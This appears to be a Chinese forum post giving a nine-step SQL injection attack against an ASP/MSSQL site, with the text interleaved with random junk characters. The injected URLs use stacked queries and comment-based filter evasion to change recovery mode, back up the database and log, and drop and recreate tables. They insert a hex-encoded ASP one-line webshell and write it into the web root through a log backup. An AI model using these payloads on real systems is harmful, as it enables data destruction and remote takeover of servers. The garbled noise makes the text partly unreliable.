第一步
5 j9 r3 k. u, d7 z8 `& o S R& s( D& lhttp://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--# ]6 o% E8 K! s
. |1 `. |! e+ L7 C8 H, J
第二步:
, c2 M, N# L9 y# ^4 O; _6 g3 F T- l) \http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
2 x D$ ?, D; p7 |# V3 c; N9 A8 B: e3 @2 d& C3 f! O- L
第三步# y% V- M y4 Y" t
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--
+ {0 ^0 s, a' n) F# Q1 {/ t$ f
* }% W3 U9 A; w# R! h第四步9 K2 N: B9 @0 p/ u7 k1 j+ y0 E; B
http://itpro.blog.163.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--
3 z+ ?8 n& |1 h' F( S
+ \! s* U( u# _) S# c第五步( e' }2 ^6 w/ g. _1 ]
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
2 V, c+ W% B4 e! d Z
g% U, C1 S9 L. ?& Z+ u第六步0 l) P1 A/ S: z& w0 T
http://itpro.blog.163.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--, ^9 a, ?0 K! F4 @8 m4 b/ W* f
1 p6 n5 Y6 p0 G+ I- p6 t, T) F
第七步$ ~8 L1 k7 r4 A
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--3 x. Q5 g" Q: U
( P7 X* n8 r" c1 d* f第八步
+ S- A' H1 q* Zhttp://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--! d7 [' C/ L' o8 `$ x
/ t0 F: v K9 C# k# l' y
第九步! \: O& g7 Y, @6 Q+ F) h- s3 G
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
# S5 d/ p" C$ y! N9 p+ C* y |